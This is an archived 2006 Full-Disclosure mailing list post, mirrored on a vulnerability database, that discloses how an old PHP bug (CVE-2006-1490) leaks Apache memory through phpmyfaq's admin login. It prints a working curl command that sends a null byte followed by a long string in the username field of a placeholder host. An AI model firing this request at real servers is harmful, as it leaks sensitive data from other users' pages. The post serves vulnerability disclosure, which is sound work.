Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15276
HistoryDec 01, 2006 - 12:00 a.m.

[Full-disclosure] phpmyfaq exploit using PHP bug, CVE-2006-1490

2006-12-0100:00:00
vulners.com
32

Long time ago I made unneccesary noise about PHP zeroday. I expected it to be
maybe much more dangerous that it appeared to be at end. There was lot of
disscussions and one of main consensus was that this bug is not exploitable
in real world because noone is using those vulnerable functions.

This bug was originally found using phpmyfaq software and wrong assumption was
made about wideness of problem. Anyway now half year later it is time to show
exploit:

curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d
"faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

Longer input you provide, longer memory dump you get. Works if PHP is
unpatched AND phpmyfaq is older than 1.6.0. Memory dump you get is part of
apache memory and often contains sensitive information from other served
pages and contexts.

To make it clear - this is NOT fault of phpmyfaq people at all. Even more,
they made workaround within an hour after I contacted them and urged users to
upgrade. Just phpmyfaq appears to be one popular software which is easily
findable by Google and this was the software where initially discovery was
made. PHP people knew about problem but ignored for long enough to discover
it independently from them.

Tรตnu


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/